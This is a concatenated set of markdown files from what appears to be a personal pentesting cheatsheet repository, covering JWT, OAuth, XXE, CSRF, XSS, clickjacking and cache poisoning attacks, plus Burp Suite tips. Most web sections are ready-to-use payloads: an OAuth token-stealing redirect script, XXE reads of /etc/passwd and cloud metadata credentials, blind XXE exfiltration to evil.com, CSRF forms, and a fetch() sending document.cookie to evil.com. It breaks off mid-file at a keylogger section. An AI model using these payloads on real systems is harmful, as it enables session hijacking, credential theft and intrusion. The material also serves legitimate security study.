 78 | If you know that the `main` function will call `printf`, you can break at `printf` address.
 79 | 
 80 | ```bash
 81 | gef➤  b *printf
 82 | gef➤ r
 83 | [...]
 84 | gef➤ c 
 85 | # break inside printf
 86 | gef➤ si
 87 | # get ouf of printf
 88 | 
 89 | # look for instructions before 'printf' call
 90 | # until you find the start of main
 91 | gef➤  x/100i $rip-0xA0
 92 | [...]
 93 |    0x5555555551cd:      push   rbp
 94 |    0x5555555551ce:      mov    rbp,rsp
 95 |    0x5555555551d1:      sub    rsp,0x50
 96 | [...]
 97 |    0x55555555524b:      call   0x5555555550c0 <printf@plt>
 98 | => 0x555555555250:      mov    rax,QWORD PTR [rbp-0x50]
 99 |    0x555555555254:      add    rax,0x8
100 | [...]
101 | gef➤  b *0x5555555551cd # adress of main
102 | ```


--------------------------------------------------------------------------------
/docs/web/JWT.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: JWT Attacks
 3 | description: JWT Attacks cheatsheet
 4 | ---
 5 | 
 6 | # JWT Attacks
 7 | 
 8 | ## Definition
 9 | 
10 | JSON Web Token (JWT) is a standard for representing claims securely between two parties. JWTs are commonly used as a means of authenticating users and transmitting information between parties in the form of a digitally signed and encoded JSON object.
11 | 
12 | There are several potential attack vectors associated with JWT, including:
13 | 
14 | 1. Tampering with the payload: An attacker may try to modify the contents of the JWT payload to gain unauthorized access to protected resources or to perform actions that the user did not authorize.
15 | 2. Replay attacks: An attacker may try to reuse a previously issued JWT to gain unauthorized access to protected resources. To protect against replay attacks, JWTs should be issued with a short expiration time and should include a unique nonce (a random value that is used once) to prevent reuse.
16 | 3. Signature forging: An attacker may try to forge the signature on a JWT in order to gain unauthorized access to protected resources. To protect against this type of attack, JWTs should be signed using a secure signing algorithm and key.
17 | 4. Weak keys: If an attacker is able to guess or obtain the key used to sign a JWT, they may be able to forge the signature and gain unauthorized access to protected resources. To protect against this type of attack, it is important to use strong keys and to keep them secure.
18 | 5. Token leakage: If a JWT is leaked or stolen, an attacker may be able to gain unauthorized access to the protected resources. To protect against this type of attack, it is important to transmit JWTs securely and to store them in a secure manner.
19 | 
20 | To protect against these types of attacks, it is important to implement JWT in a secure manner and to follow best practices for generating, signing, and validating JWTs.
21 | 
22 | ## Attacks
23 | 
24 | - `alg: none`
25 | - Weak H256 secret `john jwt.out --wordlist=jwt.secrets.list` or `hashcat -a 0 -m 16500 <jwt> <wordlist>`
26 | - Use `jwk` header to generate public key and sign token with it
27 | - Use `kid` header to `../../../../dev/null` and sign with null byte b64 key `AA==`.
28 | - SQL Injeciton in `kid` parameter.


--------------------------------------------------------------------------------
/docs/web/OAuth.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Insecure OAuth
 3 | description: Insecure OAuth cheatsheet
 4 | ---
 5 | 
 6 | # Insecure OAuth
 7 | 
 8 | ## Definition
 9 | 
10 | OAuth (Open Authorization) is a protocol that allows a user to grant third-party access to their resources without sharing their credentials. It is commonly used as a means of secure authentication and authorization for web applications, APIs, and other online services.
11 | 
12 | There are several potential attack vectors associated with OAuth, including:
13 | 
14 | - Phishing attacks: Attackers may try to trick users into granting access to their resources by disguising themselves as a legitimate OAuth provider and presenting a fake login or authorization prompt.
15 | - Access token leakage: If an access token is leaked or stolen, an attacker may be able to gain unauthorized access to the protected resources. This can occur if the token is stored insecurely or transmitted over an unencrypted connection.
16 | - Misuse of the authorization grant: Attackers may try to abuse the authorization grant by using it to access resources that were not intended to be shared, or by using the grant to perform actions that the user did not authorize.
17 | - Resource owner impersonation: An attacker may try to impersonate the resource owner and gain access to their resources by manipulating the OAuth authorization process.
18 | - Client impersonation: An attacker may try to impersonate a legitimate OAuth client and gain access to protected resources on behalf of the client.
19 | 
20 | To protect against these types of attacks, it is important to implement OAuth in a secure manner and to educate users about the potential risks associated with granting third-party access to their resources.
21 | 
22 | ## Attacks
23 | 
24 | - Get valid token, and change username on auth request which goes to the client application, ex `POST /authenticate`
25 | - Exploit redirect_uri to steal access token (whitelist bypass by exploiting an OpenRedirect on the client application)
26 | 
27 | ```javascript
28 | <script>
29 | if (!document.location.hash) {
30 |     window.location = 'https://example.com/auth?client_id=CLIENT_ID&redirect_uri=https://example.com/oauth-callback/../post/next?path=https://evil.com/&response_type=token&nonce=399721827&scope=openid%20profile%20email';
31 | } else {
32 |     window.location = '/?'+btoa(document.location);
33 | }
34 | </script>
35 | ```
36 | 
37 | - No state, force linking, `GET /oauth-linking?code=G6yRLEh0waXxTON0Xm5rLXC3dWScTqvn1Wd964vuvTR` drop request & send this to the victim, it will link OAuth your account to their main account
38 | - Extract openID info `GET /.well-known/openid-configuration`, create a client register with logo `"logo_uri":"http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"`, then dump logo `GET /client/<client_id>/logo`


--------------------------------------------------------------------------------
/docs/web/XXE.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: XXE Injection
 3 | description: XXE Injection cheatsheet
 4 | ---
 5 | 
 6 | # XXE Injection
 7 | 
 8 | XXE (XML External Entity) attacks are a type of injection attack in which an attacker attempts to exploit a vulnerability in an application that parses XML input. This vulnerability can allow an attacker to inject malicious code into the XML input, which is then executed by the application.
 9 | 
10 | ## Attacks
11 | 
12 | ### Read files
13 | 
14 | ```xml
15 | <?xml version="1.0" encoding="UTF-8"?>
16 | <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
17 | <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
18 | ```
19 | 
20 | ### SSRF
21 | 
22 | ```xml
23 | <?xml version="1.0" encoding="UTF-8"?>
24 | <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"> ]>
25 | <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
26 | ```
27 | 
28 | ### XML Parameter entities
29 | 
30 | ```xml
31 | <!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>
32 | ```
33 | 
34 | ### XML Injection (not in DOCTYPE)
35 | 
36 | ```xml
37 | <foo xmlns:xi="http://www.w3.org/2001/XInclude">
38 | <xi:include parse="text" href="file:///etc/passwd"/></foo>
39 | 
40 | # POST parameters example :
41 | productId=<foo+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude"><xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/passwd"/></foo>&storeId=1
42 | ```
43 | 
44 | ### Exfil using SVG images
45 | 
46 | ```xml
47 | <?xml version="1.0" standalone="yes"?>
48 | <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
49 | <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
50 |     <text font-size="16" x="0" y="16">&xxe;</text>
51 | </svg>
52 | ```
53 | 
54 | ### Blind XXE - Exfil using DTD
55 | 
56 | Send to server :
57 | 
58 | ```xml
59 | <?xml version="1.0" encoding="UTF-8"?>
60 | <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://evil.com/exploit.dtd"> %xxe;]>
61 | <stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>
62 | ```
63 | 
64 | Malicious DTD (text/xml) :
65 | 
66 | 
67 | ```xml
68 | <!ENTITY % file SYSTEM "file:///etc/hostname">
69 | <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'https://evil.com//?x=%file;'>">
70 | %eval;
71 | %exfiltrate;
72 | ```
73 | 
74 | ### Error based DTD
75 | 
76 | ```xml
77 | <!ENTITY % file SYSTEM "file:///etc/passwd">
78 | <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
79 | %eval;
80 | %error;
81 | ```


--------------------------------------------------------------------------------
/docs/web/authentication.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Authentication enumeration / bruteforce
 3 | description: Authentication enumeration and bruteforce cheatsheet
 4 | ---
 5 | 
 6 | # Authentication enumeration / bruteforce 
 7 | 
 8 | ## Methodology
 9 | 
10 | - Enumeration depending on :
11 |     - Response
12 |         - Code (ex: 302 redirection)
13 |         - Length (ex: error / success message)
14 |         - Time (ex: password hashing can take some time)
15 |     - Account is locked only if you try to bruteforce an existing username
16 | - Bypass IP block
17 |     - Header `X-Forwarded-For`
18 |     - Reset the error count by alternating successful login and bruteforce try
19 | - Bypass 2FA
20 |     - Bruteforce 2FA Token
21 |     - Use the token of another account
22 | 
23 | ## GraphQL Batching Attack 
24 | 
25 | A batching attack refers to abusing this batch query feature to perform many GraphQL operations within one single web request. The batching attack helps facilitate brute force attacks by reducing the total number of potential requests needed to be successful.
26 | 
27 | Example with OTP token bruteforcing :
28 | 
29 | ![GraphQL_Batching_Attack.png](/assets/img/web/GraphQL_Batching_Attack.png)


--------------------------------------------------------------------------------
/docs/web/bugbounty/02-scanner.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Scanner
 3 | description: Introduction to web vulnerabilites scanner
 4 | ---
 5 | 
 6 | # Scanner
 7 | 
 8 | ## General
 9 | 
10 | ### nuclei
11 | 
12 | Fast and customizable vulnerability scanner based on simple YAML.
13 | 
14 | > Github [link](https://github.com/projectdiscovery/nuclei).
15 | 
16 | #### Installation
17 | 
18 | Download [release](https://github.com/projectdiscovery/nuclei/releases/latest) binary.
19 | 
20 | #### Examples
21 | 
22 | ```
23 | ➜ nuclei -disable-update-check -silent -u https://www.xanhacks.xyz
24 | [2022-09-01 05:54:21] [google-floc-disabled] [http] [info] https://www.xanhacks.xyz
25 | [2022-09-01 05:54:26] [metatag-cms] [http] [info] https://www.xanhacks.xyz [Hugo 0.101.0]
26 | [2022-09-01 05:54:27] [tech-detect:jsdelivr] [http] [info] https://www.xanhacks.xyz
27 | [2022-09-01 05:54:36] [ssl-dns-names] [ssl] [info] https://www.xanhacks.xyz [www.xanhacks.xyz]
28 | [2022-09-01 05:54:41] [http-missing-security-headers:content-security-policy] [http] [info] https://www.xanhacks.xyz
29 | [2022-09-01 05:54:41] [http-missing-security-headers:permission-policy] [http] [info] https://www.xanhacks.xyz
30 | [2022-09-01 05:54:41] [http-missing-security-headers:clear-site-data] [http] [info] https://www.xanhacks.xyz
31 | [2022-09-01 05:54:41] [http-missing-security-headers:access-control-allow-headers] [http] [info] https://www.xanhacks.xyz
32 | [2022-09-01 05:54:41] [http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] https://www.xanhacks.xyz
33 | ```
34 | 
35 | ## XSS - Cross Site Scripting
36 | 
37 | ### kxss
38 | 
39 | Request the URLs, check the response body for any reflected parameters. There will be many false positives here.
40 | 
41 | > Github [link](https://github.com/tomnomnom/hacks/tree/master/kxss).
42 | 
43 | #### Installation
44 | 
45 | ```
46 | ➜ go install github.com/tomnomnom/hacks/kxss@latest
47 | ```
48 | 
49 | #### Examples
50 | 
51 | ```
52 | ➜ echo 'https://example.com/?search=a' | kxss
53 | param search is reflected and allows " on https://example.com/?search=a
54 | param search is reflected and allows ' on https://example.com/?search=a
55 | param search is reflected and allows < on https://example.com/?search=a
56 | param search is reflected and allows > on https://example.com/?search=a
57 | ```


--------------------------------------------------------------------------------
/docs/web/bugbounty/05-reports.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Easy reports
 3 | description: Bug bounty tips.
 4 | ---
 5 | 
 6 | # Easy reports
 7 | 
 8 | ## Sensitive information leak via Referrer header
 9 | 
10 | Sensitive information (ex: password reset token) leak via Referrer header
11 | 
12 | Example :
13 | 
14 | - Request password reset to your email address
15 | - Click on the password reset link
16 | - Dont change password
17 | - Click any 3rd party websites(eg: Facebook, twitter)
18 | - Intercept the request in burpsuite proxy- 
19 | - Check if the referer header is leaking password reset token.
20 | 
21 | Source : [book.hacktricks.xyz](https://book.hacktricks.xyz/pentesting-web/reset-password)
22 | 
23 | ## nOtWASP bottom 10: vulnerabilities that make you cry
24 | 
25 | 1. Autocomplete=off not set
26 | 2. Missing httponly flag
27 | 3. Tabnabbing
28 | 4. Missing security headers
29 | 5. Ex-XSS
30 | 6. CVE-XXXX Unspecified vulnerability in unspecified component
31 | 7. CSV Injection with no impact
32 | 8. Missing rate-limit/CAPTCHA
33 | 9. Useless information disclosure (ex: Apache version)
34 | 10. Excessive concurrent sessions
35 | 
36 | Source : [portswigger.net](https://portswigger.net/research/notwasp-bottom-10-vulnerabilities-that-make-you-cry)


--------------------------------------------------------------------------------
/docs/web/bugbounty/06-uncommon-vulns.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Uncommon Vulnerabilities
 3 | description: Uncommon and exciting web vulnerabilities
 4 | ---
 5 | 
 6 | # Uncommon Vulnerabilities
 7 | 
 8 | ##  Cross-Site Script Inclusion (XSSI)
 9 | 
10 | - https://www.hacksplaining.com/prevention/xssi
11 | - https://book.hacktricks.xyz/pentesting-web/xssi-cross-site-script-inclusion
12 | - https://github.com/luh2/DetectDynamicJS
13 | 
14 | ## XS-Search / XS-Leaks
15 | 
16 | - https://book.hacktricks.xyz/pentesting-web/xs-search
17 | - https://cheatsheetseries.owasp.org/cheatsheets/XS_Leaks_Cheat_Sheet.html
18 | - https://xsleaks.dev/
19 | - https://xsinator.com/
20 | 
21 | ## CSS Injection
22 | 
23 | - https://book.hacktricks.xyz/pentesting-web/xs-search/css-injection


--------------------------------------------------------------------------------
/docs/web/burpsuite/intruder.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Intruder tab
 3 | description: Burpsuite intruder tab cheatsheets
 4 | ---
 5 | 
 6 | # Burpsuite Intruder tab
 7 | 
 8 | ## List of Attack Types
 9 | 
10 | ### Sniper
11 | 
12 | The sniper attack uses only one payload set, and it replaces only one position at a time. It loops through the payload set, first replacing only the first marked position with the payload and leaving all other positions to their original value. After its done with the first position, it continues with the second position.
13 | 
14 | ### Battering ram
15 | 
16 | The battering ram attack type places the same payload value in all positions. It uses only one payload set. It loops through the payload set and replaces all positions with the payload value.
17 | 
18 | ### Pitch fork
19 | 
20 | The pitchfork attack type uses one payload set for each position. It places the first payload in the first position, the second payload in the second position, and so on.
21 | 
22 | It then loops through all payload sets at the same time. The first request uses the first payload from each payload set, the second request uses the second payload from each payload set, and so on.
23 | 
24 | ### Cluster bomb
25 | 
26 | The cluster bomb attack tries all different combinations of payloads. It still puts the first payload in the first position, and the second payload in the second position. But when it loops through the payload sets, it tries all combinations.
27 | 
28 | This attack type is useful for a brute-force attack. Load a list of commonly used usernames in the first payload set, and a list of commonly used passwords in the second payload set. The cluster bomb attack will then try all combinations.
29 | 
30 | > References [sjoerdlangkemper.nl](https://www.sjoerdlangkemper.nl/2017/08/02/burp-intruder-attack-types/).
31 | 
32 | ## Payloads
33 | 
34 | Payload processing allows you to perform checks or operations on your payload sets.
35 | 
36 | You can remove or add characters to the payload URL encoding section, it can be usefull if you are using bad characters.
37 | 
38 | ## Options
39 | 
40 | You can remove the first default request in the attack results by unchecking the "Make unmodified baseline request".
41 | 
42 | ### Grep - Match
43 | 
44 | You can search for string in the response. Exemple with user enumeration via error message :
45 | 
46 | ![User enumeration via error message]({{ base_url }}/assets/img/web/burp_intruder_grep_match.png)
47 | 
48 | In the exemple below, 'ansible' is a valid username.
49 | 


--------------------------------------------------------------------------------
/docs/web/burpsuite/others.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Others
 3 | description: Others burpsuite tips
 4 | ---
 5 | 
 6 | # Burpsuite
 7 | 
 8 | ## Dark mode
 9 | 
10 | Menu : `User options` > `Display`
11 | 
12 | ![Enable Dark mode in Burpsuite]({{ base_url }}/assets/img/web/burp_darkmode.png)
13 | 
14 | ## Enable JavaScript Redirection
15 | 
16 | Menu : `Project Options` > `HTTP`.
17 | 
18 | ![Enable JS driven redirection]({{ base_url }}/assets/img/web/burp_js_redirection.png)
19 | 
20 | ## Set 'Intercept : Off' as default on Burpsuite startup
21 | 
22 | Menu : `User options` > `Misc`.
23 | 
24 | ![Intercept off at startup]({{ base_url }}/assets/img/web/burp_intercept_false.png)
25 | 
26 | ## Autoscroll on search
27 | 
28 | ![Autosroll on search]({{ base_url }}/assets/img/web/burp_response_autoscroll.png)
29 | 


--------------------------------------------------------------------------------
/docs/web/burpsuite/proxy.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Proxy tab
 3 | description: Burpsuite proxy tab cheatsheets
 4 | ---
 5 | 
 6 | # Burpsuite Proxy tab
 7 | 
 8 | ## HTTP Proxy
 9 | 
10 | ### Filter HTTP History only for scope items
11 | 
12 | ![Site map for scope items]({{ base_url }}/assets/img/web/burp_sitemap_scope.png)
13 | 
14 | ## Options
15 | 
16 | ### Intercepts only scope URLs
17 | 
18 | ![Intercepts only scope URLs in Burpsuite]({{ base_url }}/assets/img/web/burp_and_scope.png)
19 | 
20 | Websockets will still be intercepted, you can disable it by unchecking this two boxes :
21 | 
22 | ![Remove interception of Websockets in Burpsuite]({{ base_url }}/assets/img/web/burp_remove_websockets.png)
23 | 
24 | ### Match and replace
25 | 
26 | Replace string or regex from request or response to a specific string.
27 | 
28 | ![Macth and replace rules]({{ base_url }}/assets/img/web/burp_match_replace_xss.png)
29 | 


--------------------------------------------------------------------------------
/docs/web/burpsuite/target.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Target tab
 3 | description: Burpsuite target tab cheatsheets
 4 | ---
 5 | 
 6 | # Burpsuite Target tab
 7 | 
 8 | ## Site map
 9 | 
10 | You can launch passive / active scan on a specific host by right clicking on the it.
11 | 
12 | ### Filter sitemap only for scope items
13 | 
14 | - Menu : `Target` > `Site map` > `Filter : ...`
15 | 
16 | ![Site map for scope items]({{ base_url }}/assets/img/web/burp_sitemap_scope.png)
17 | 
18 | ### Engagements tools
19 | 
20 | `Right click on the website` -> `Engagement tools` -> `Select tool name`.
21 | 
22 | #### Find references
23 | 
24 | Find where a specific link has been found.
25 | 
26 | #### Search for string
27 | 
28 | You can search for string in the whole website.
29 | 
30 | ![Search string in the website]({{ base_url }}/assets/img/web/burp_target_sitemap_search.png)
31 | 
32 | #### Search for comments
33 | 
34 | Find comments in HTML, CSS and JS.
35 | 


--------------------------------------------------------------------------------
/docs/web/business-logic.md:
--------------------------------------------------------------------------------
 1 | # Business logic vulnerability
 2 | 
 3 | ## Definition
 4 | 
 5 | Business logic vulnerabilities are weaknesses in the way a business system or application is designed or implemented that can be exploited by attackers to gain unauthorized access to resources, disrupt business processes, or steal sensitive data.
 6 | 
 7 | To protect against business logic vulnerabilities, it is important to follow best practices for secure application design and implementation, including input validation, access control, secure data storage, and strong authentication and authorization controls.
 8 | 
 9 | ## Examples
10 | 
11 | - Buy products with negative quantity
12 | - Change email in setting to `@company`
13 | - Apply Coupon1, then Coupon2, then 1, then 2, ...
14 | - Price that goes over 2,147,483,647, and go negative
15 | - Length of email > 255 (bypass end of domain)
16 |     - "AAAA...AAAA@victim.com" (255 len) + ".evil.com"
17 | - Omit current password input
18 | - Bypass verification, add to cart -> verif amount -> add to cart -> confirm order
19 | - Drop request to select low priv roles
20 | - Cryptography oracle to encrypt/decrypt


--------------------------------------------------------------------------------
/docs/web/cache-poisoning.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Cache poisoning
 3 | description: Web cache poisoning cheatsheet
 4 | ---
 5 | 
 6 | # Web cache poisoning
 7 | 
 8 | ## Definition
 9 | 
10 | **Web cache poisoning** is a type of cyber attack that targets the cache of a web server or web browser. The goal of this attack is to **inject malicious or unauthorized content into the cache**, so that it is served to users who request the same content in the future. This can be used to spread malware or to trick users into visiting malicious websites, for example.
11 | 
12 | ## Cheatsheet
13 | 
14 | - Cache Host header to control $URL/resources/...
15 | - Cache cookie to control pages content (language=fr)
16 | - `GET /resources/js/tracking.js` and `X-Forwarded-Host` to redirect to my exploit server
17 | - `Vary` header provides list of cache key header
18 |     - If User-Agent in Vary, try to capture it (ex: load image to your website) or BF UA
19 | - Unkeyed query string : `GET /?'><script>alert(1)</script>` or param `/?utm_content='%3e%3cscript%3ealert(1)%3c%2fscript%3e`
20 | - Parameter cloacking `/js/geolocate.js?callback=setCountryCookie&utm_content=toto;callback=eval(alert(1))%3bconsole.log` will serve `/js/geolocate.js?utm_content=toto&callback=eval(alert(1))%3bconsole.log`. You need a param that will be removed from the cache
21 | - GET request with body
22 | 
23 | ```
24 | GET /js/geolocate.js?callback=setCountryCookie HTTP/1.1
25 | Host: xxx.web-security-academy.net
26 | X-HTTP-Method-Override: POST
27 | [...]
28 | 
29 | callback=alert(1);console.log
30 | ```
31 | 
32 | - URL normalization : caching `/notfound<script>alert(1)</script>` into `/notfound%3Cscript%3Ealert(1)%3C/script%3E`
33 | 
34 | ## References
35 | 
36 | - [PortSwigger - Web Cache Poisoning](https://portswigger.net/web-security/web-cache-poisoning)


--------------------------------------------------------------------------------
/docs/web/clickjacking.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Clickjacking
 3 | description: Clickjacking cheatsheet
 4 | ---
 5 | 
 6 | # Clickjacking
 7 | 
 8 | ## Definition
 9 | 
10 | **Clickjacking**, also known as "UI redress attack" or "user interface redress attack," is a type of cyber attack where a malicious website or ad is designed to **trick users into clicking on something** other than what they think they are clicking on. This can be used to steal sensitive information, such as login credentials or personal information, or to perform actions on the user's behalf without their knowledge or consent.
11 | 
12 | ## Cheatsheet
13 | 
14 | ```html
15 | <head>
16 | <style>
17 | #victim_website {
18 | 	position:relative;
19 | 	width:700px;
20 | 	height:520px;
21 | 	opacity:0.20;
22 | 	z-index:2;
23 | }
24 | #malicious_overlay {
25 | 	position:absolute;
26 | 	top:495px;
27 | 	left:70px;
28 | 	z-index:1;
29 | }
30 | </style>
31 | </head>
32 | <body>
33 | 	<div id="malicious_overlay">
34 | 	    <button>click</button>
35 | 	</div>
36 |         <iframe id="victim_website" src="https://example.com/my-account"></iframe>
37 | </body>
38 | ```
39 | 
40 | - Prefilled input : https://example.com/my-account?**email=toto@toto.com**
41 | - Bypass JS script that block iframe like :
42 | 
43 | ```html
44 | <script>
45 | if(top != self) {
46 |     window.addEventListener("DOMContentLoaded", function() {
47 |         document.body.innerHTML = 'This page cannot be framed';
48 |     }, false);
49 | }
50 | </script>
51 | ```
52 | 
53 | Use iframe `sandbox` attribute ([list](https://www.w3schools.com/tags/att_iframe_sandbox.asp)). Like `<iframe id="victim_website" sandbox="allow-forms" src="https://example.com/my-account?email=toto@toto.com"></iframe>`.
54 | 
55 | - XSS that need a click (so use Clickjacking to do the action)
56 | - Mutlistep clickjacking (click on 2 buttons, use 2 overlays)
57 | 
58 | ## References
59 | 
60 | - [PortSwigger - Clickjacking](https://portswigger.net/web-security/clickjacking)


--------------------------------------------------------------------------------
/docs/web/clientside/01-introduction.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Introduction 
 3 | description: Introduction to client side web pentesting
 4 | ---
 5 | 
 6 | # Introduction to client side
 7 | 
 8 | ## Same-origin policy (SOP)
 9 | 
10 | The same-origin policy is a critical security mechanism that restricts how a document or script loaded by one origin can interact with a resource from another origin.
11 | 
12 | Two URLs have the same origin if the protocol, port, and host are the same for both.
13 | 
14 | > References : [developer.mozilla.org](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).
15 | 
16 | ## Cross-Origin Resource Sharing (CORS)
17 | 
18 | Cross-Origin Resource Sharing (CORS) is an HTTP-header based mechanism that allows a server to indicate any origins (domain, scheme, or port) other than its own from which a browser should permit loading resources.
19 | 
20 | For security reasons, browsers restrict cross-origin HTTP requests initiated from scripts. For example, XMLHttpRequest and the Fetch API follow the same-origin policy. This means that a web application using those APIs can only request resources from the same origin the application was loaded from **unless the response from other origins includes the right CORS headers**.
21 | 
22 | > References : [developer.mozilla.org](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS).
23 | 
24 | ## Not "safe" headers
25 | 
26 | List of forbidden headers : `Accept-Charset`, `Accept-Encoding`, `Access-Control-Request-Headers`, `Access-Control-Request-Method`, `Connection`, `Content-Length`, `Cookie`, `Cookie2`, `Date`, `DNT`, `Expect`, `Host`, `Keep-Alive`, `Origin`, `Referer`, `TE`, `Trailer`, `Transfer-Encoding`, `Upgrade`, `Via`.
27 | 
28 | This headers cannot be set by Javascript when you are makeing a request.


--------------------------------------------------------------------------------
/docs/web/clientside/02-CSRF.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: CSRF - Cross Site Request Forgery
 3 | description: Introduction Cross Site Request Forgery
 4 | ---
 5 | 
 6 | # CSRF Attack
 7 | 
 8 | ## Definition
 9 | 
10 | Cross-Site Request Forgery (CSRF) is a type of web security vulnerability that allows an attacker to send malicious requests from a victim's browser to a target website. These attacks are designed to trick the victim's browser into believing that the request is legitimate, and to carry out an action on the target website on behalf of the victim.
11 | 
12 | ## Mitigations
13 | 
14 | 1. Use the `SameSite` cookie attribute to :
15 |     - `Strict` : the browser will **not** include the cookie in any requests that originate from another site.
16 |     - `Lax` :  the browser will include the cookie in requests that originate from another site but only if **two conditions** are met : GET method and the request resulted from a top-level navigation by the user, such as clicking a link (not requests by JS).
17 | 2. Use random CSRF Token.
18 | 
19 | ## Attacks
20 | 
21 | Attacks are often based on two things :
22 | 
23 | 1. Cookie-based session handling.
24 | 2. No unpredictable request parameters.
25 | 
26 | Examples :
27 | 
28 | - Change request method
29 | - Remove CSRF attribute
30 | - Cookie CSRF is the same as the CSRF param.
31 |     - Use a HTTP response splitting to set the cookie of a specific value
32 |     - Perform CSRF
33 |     - `<img src="https://victim.com/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>`
34 | - CSRF check based on Referer header
35 |     - Bypass by disabling Referer header `<meta name="referrer" content="never">`
36 |     - Bypass it by including the correct Referer `evil.com?good.com`
37 |         - Use header [Referrer-Policy: unsafe-url](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy#directives) and `history.pushState("", "", "/?evil.com")`
38 | 
39 | ## Payloads
40 | 
41 | ### GET
42 | 
43 | ```html
44 | <img src="https://example.com/logout">
45 | ```
46 | 
47 | ### POST
48 | 
49 | ```html
50 | <form method="POST" action="https://example.com/email">
51 |     <input type="hidden" name="email" value="hello@hello.com">
52 |     <input type="hidden" name="csrf" value="0KL98nyeTFWocYvP8q9RHGrIt9IYn1Q7">
53 | </form>
54 | <script>
55 |         document.forms[0].submit();
56 | </script>
57 | ```
58 | 
59 | ## References
60 | 
61 | - https://portswigger.net/web-security/csrf
62 | - https://portswigger.net/web-security/csrf/samesite-cookies
63 | 


--------------------------------------------------------------------------------
/docs/web/clientside/03-XSS.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: XSS - Cross Site Scripting
  3 | description: XSS cheatsheets, payloads and tricks.
  4 | ignore_macros: true
  5 | ---
  6 | 
  7 | # XSS
  8 | 
  9 | ## Attack
 10 | 
 11 | ### Payloads
 12 | 
 13 | ```html
 14 | <sCRipT>alert()</scRipt>
 15 | <a href="javascript:alert()"></a>
 16 | <img src=x onerror="alert()">
 17 | 
 18 | <svg><animatetransform onbegin=alert(1)>
 19 | 
 20 | <iframe src='https://example.com/?search="><body onresize=print()>' onload=this.style.width='100px'>
 21 | 
 22 | domain.com/?search=<div id=anchor onfocus=alert(document.cookie) tabindex=1>#anchor
 23 | ```
 24 | 
 25 | More payloads on [https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet).
 26 | 
 27 | ### HTML events and tags
 28 | 
 29 | Lists :
 30 | 
 31 | - [all-html-events.txt](/assets/txt/all-html-events.txt)
 32 | - [all-html-tags.txt](/assets/txt/all-html-tags.txt)
 33 | 
 34 | > Source [www.w3schools.com - event](https://www.w3schools.com/tags/ref_eventattributes.asp) and [www.w3schools.com - tags](https://www.w3schools.com/TAGs/).
 35 | 
 36 | ### DOM XSS
 37 | 
 38 | The following are some of the main sinks that can lead to DOM-XSS vulnerabilities:
 39 | 
 40 | ```
 41 | document.write()  
 42 | document.writeln()  
 43 | document.domain  
 44 | element.innerHTML  
 45 | element.outerHTML  
 46 | element.insertAdjacentHTML  
 47 | element.onevent  
 48 | ```
 49 | 
 50 | The following jQuery functions are also sinks that can lead to DOM-XSS vulnerabilities:
 51 | 
 52 | ```
 53 | add()  
 54 | after()  
 55 | append()  
 56 | animate()  
 57 | insertAfter()  
 58 | insertBefore()  
 59 | before()  
 60 | html()  
 61 | prepend()  
 62 | replaceAll()  
 63 | replaceWith()  
 64 | wrap()  
 65 | wrapInner()  
 66 | wrapAll()  
 67 | has()  
 68 | constructor()  
 69 | init()  
 70 | index()  
 71 | jQuery.parseHTML()  
 72 | $.parseHTML()
 73 | ```
 74 | 
 75 | > Source [portswigger.net](https://portswigger.net/web-security/cross-site-scripting/dom-based).
 76 | 
 77 | ## Bypass
 78 | 
 79 | ### Replace function
 80 | 
 81 | The `replace` function only replace the first occurence.
 82 | 
 83 | ```js
 84 | > "<img src=x onerror='alert()'>".replace("<", "&lt;")
 85 | "&lt;img src=x onerror='alert()'>"
 86 | 
 87 | 
 88 | > "<<img src=x onerror='alert()'>".replace("<", "&lt;")
 89 | "&lt;<img src=x onerror='alert()'>"
 90 | ```
 91 | 
 92 | ### jQuery's $() selector
 93 | 
 94 | - `<iframe src="https://example.com/" onload="this.src+='<img src=x onerror=print()>'"></iframe>`
 95 | 
 96 | ### AngularJS ng-app
 97 | 
 98 | - `{{$on.constructor('alert(1)')()}}`
 99 | 
100 | ### Send cookie via POST request
101 | 
102 | ```html
103 | <script>
104 | fetch('https://evil.com',{method:'POST',mode:'no-cors',body:document.cookie});
105 | </script>
106 | ```
107 | 
108 | ### Capture passwords (keylogger)
109 | 
110 | ```html
111 | <input name=username id=username>
